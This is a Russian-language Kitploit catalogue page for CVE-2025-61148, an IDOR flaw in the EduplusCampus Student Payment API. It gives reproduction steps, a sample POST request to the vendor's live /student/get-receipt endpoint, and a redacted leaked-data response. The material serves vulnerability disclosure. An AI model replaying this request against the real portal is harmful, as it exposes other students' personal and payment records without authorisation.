Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2025-61148 — Уязвимость существует в Student Payment API. Приложение не выполняет надлежащую проверку того, авторизован ли пользователь, запрашивающий квитанцию, на её просмотр. Изменяя параметр rec_no в запросе API, злоумышленник может получить доступ к квитанциям других пользователей. | Kitploit
Инструменты/GitHubGitHub/sharma19d/cve-2025-61148
Анализ уязвимостейЭксплуатация веб-приложенийТестирование безопасности APIСбор информацииТестирование на ПроникновениеОбучение и Образование
GitHubsharma19d/cve-2025-61148

CVE-2025-61148

Уязвимость существует в Student Payment API. Приложение не выполняет надлежащую проверку того, авторизован ли пользователь, запрашивающий квитанцию, на её просмотр. Изменяя параметр rec_no в запросе API, злоумышленник может получить доступ к квитанциям других пользователей.

Репозиторий
49 месяцев назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2025-61148

Уязвимость существует в Student Payment API. Приложение не проверяет должным образом, авторизован ли пользователь, запрашивающий квитанцию, для её просмотра. Изменяя параметр rec_no в API-запросе, злоумышленник может получить доступ к квитанциям других пользователей.

CVE-2025-61148: IDOR в EduplusCampus Student Payment API

CVE ID: CVE-2025-61148 Тип уязвимости: Insecure Direct Object Reference (IDOR) Затронутый продукт: EduplusCampus Затронутая конечная точка: /student/get-receipt Исследователь: Vinay Sharma

Краткое описание

Критическая уязвимость типа Insecure Direct Object Reference (IDOR) была обнаружена в студенческом портале EduplusCampus (версия 3.0.1). Эта уязвимость позволяет аутентифицированному пользователю получать доступ к конфиденциальным персональным и финансовым данным других студентов, изменяя параметр rec_no в API-запросе.

Воздействие

Успешная эксплуатация позволяет злоумышленнику получить:

  • Полное имя и номер студенческого билета
  • Сумму платежа и даты
  • Идентификаторы транзакций (TID) и банковские реквизиты
  • Персональные данные (PII)

Детали уязвимости

Приложение не проверяет должным образом авторизацию пользователя, запрашивающего платёжную квитанцию. Параметр rec_no является последовательным или угадываемым, и сервер возвращает данные квитанции для запрошенного номера, не проверяя, принадлежит ли она текущему авторизованному пользователю.

Шаги воспроизведения

  1. Войдите в студенческий портал.
  2. Перейдите в раздел формирования квитанций.
  3. Перехватите POST-запрос к /student/get-receipt.
  4. Найдите параметр rec_no в JSON-теле запроса.
  5. Измените значение rec_no на другой действительный номер квитанции (например, замените PCUF-232025 на PCUF-231824).
  6. Отправьте запрос.
  7. Сервер возвращает персональные и финансовые данные студента, связанного с этим номером квитанции.
image
image

Пример запроса

root@kitploit:~
POST /student/get-receipt HTTP/1.1
Host: student.edupluscampus.com
Content-Type: application/json
Authorization: Bearer <token>

{
    "rec_no": "PCUF-233012"
}

### Leaked DATA Example:
{
    "fullname": "REDACTED_NAME",
    "rollno": "CSE2019XXX",
    "component_total_amount": 55000.0,
    "trans_list": [
        {
            "date": "21-Oct-2024",
            "mode": "Online",
            "amount": 55000.0,
            "tid": "42951XXXX"
        }
    ]
}

Информация о вендоре

  • Вендор: EduplusCampus
  • Продукт: EduplusCampus Student Portal / Student Payment API

Затронутые версии

  • Версия: EduplusCampus 3.0.1

Обнаружил

  • Vinay Sharma - исследователь безопасности
Скачать инструмент